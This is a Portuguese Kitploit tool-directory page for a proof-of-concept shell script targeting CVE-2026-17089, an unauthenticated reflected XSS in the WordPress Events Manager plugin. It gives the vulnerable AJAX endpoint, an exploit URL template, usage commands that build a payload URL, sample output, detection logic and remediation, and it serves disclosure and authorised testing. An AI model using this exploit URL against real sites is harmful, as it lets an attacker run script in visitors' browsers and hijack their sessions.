Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-17089-PoC-pwnVader — PoC em Shell para CVE-2026-17089, um XSS refletido não autenticado no plugin WordPress Events Manager (<= 7.4.0.1); identifica o plugin e testa a reflexão de header_format. | Kitploit
Ferramentas/GitHubGitHub/pwnvader/cve-2026-17089-poc-pwnvader
Scanners de VulnerabilidadesScanners de Vulnerabilidades WebAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubpwnvader/cve-2026-17089-poc-pwnvader

CVE-2026-17089-PoC-pwnVader

PoC em Shell para CVE-2026-17089, um XSS refletido não autenticado no plugin WordPress Events Manager (<= 7.4.0.1); identifica o plugin e testa a reflexão de header_format.

Ver Repositório
há 10 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-17089 — Events Manager <= 7.4.0.1 — XSS refletido não autenticado (header_format)

Autor: pwnVader · Licença: MIT (raiz do repositório)

ComponenteEvents Manager – Calendar, Bookings, Tickets, and more! (plugin WordPress)
TipoCWE-79 — Cross-Site Scripting Refletido
Afetado<= 7.4.0.1
Corrigidoversão posterior 7.4.x (wp_kses_post() aplicado em EM_Events::output_grouped())
CVECVE-2026-17089 — CVSS 3.1 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
PoCpoc.sh

Resumo

O ponto de entrada do shortcode sanitiza header_format com wp_kses(), mas a ação AJAX não autenticada search_events_grouped contorna essa sanitização e ecoa o valor na resposta HTML (EM_Events::output_grouped()). Um atacante remoto e não autenticado pode criar uma URL que executa JavaScript arbitrário na origem do site afetado para qualquer usuário que a abra (UI:R).

Uso

# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com

# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"

Exemplo de saída (check)

== CVE-2026-17089 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Events Manager assets are served (plugin installed)
  [info] Stable tag: 7.1.7
  [PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)

[2] Unauthenticated reflection test (read-only, benign marker)
  [PASS] endpoint reflected header_format UNESCAPED (the raw  is in the response)

== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).

URL de exploração

https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>

Lógica de detecção

  1. Fingerprint: readme.txt (Stable tag) e/ou o caminho do asset do plugin /wp-content/plugins/events-manager/includes/js/events-manager.js.
  2. Envie um marcador benigno (``) para admin-ajax.php?action=search_events_grouped com header_format definido como o marcador e verifique se a marcação bruta é refletida sem escape no corpo da resposta.

Remediação

  • Atualize o Events Manager para a versão atual (a correção aplica wp_kses_post() a header_format dentro da função de renderização, cobrindo todos os chamadores).
  • Provisório: bloqueie a ação AJAX não autenticada search_events_grouped ou filtre header_format no nível de WAF/aplicação.

Referências

  • NVD — CVE-2026-17089: https://nvd.nist.gov/vuln/detail/CVE-2026-17089
  • GitHub Advisory: https://github.com/advisories/GHSA-gg76-jx66-hjq8

Aviso legal

Apenas para testes de segurança autorizados. O PoC é somente leitura (check) ou imprime uma URL (url); nenhum dado é modificado.

Baixar ferramenta